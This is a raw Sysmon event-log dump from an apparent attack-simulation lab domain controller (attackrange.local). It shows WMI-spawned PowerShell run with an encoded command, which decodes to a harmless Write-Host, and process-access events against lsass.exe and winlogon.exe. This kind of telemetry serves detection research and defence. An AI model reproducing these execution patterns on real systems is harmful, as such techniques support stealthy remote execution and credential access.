16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6DD2-603E-CBAA-00000000AD01}104809904C:\Windows\system32\conhost.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002241969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_43gjvqil.f1o.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002241968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002241966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002241965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0uafgtsx.i0p.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002241964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CBAA-00000000AD01}10480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.375{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002241957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002241956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.370{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /En VwByAGkAdABlAC0ASABvAHMAdAAgADMANQBmADcAZAA4AGUAYQAtAGUAYQA1AGEALQA0ADkAMgBiAC0AOQBkADUAMwAtADgAYgBiAGMAOABlADIAYQA5ADMAOAA3AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002241955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_0uafgtsx.i0p.ps12021-03-02 16:54:42.358 10341000x80000000000000002241954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002241952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.358{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDEAFB9C81EF873ECCB15D639ACE7BB1,SHA256=A06AE54EC9C949EF89E382CEA04F88A80FDA7D1C56D010A9AC40AE8CED7B08F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002241951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 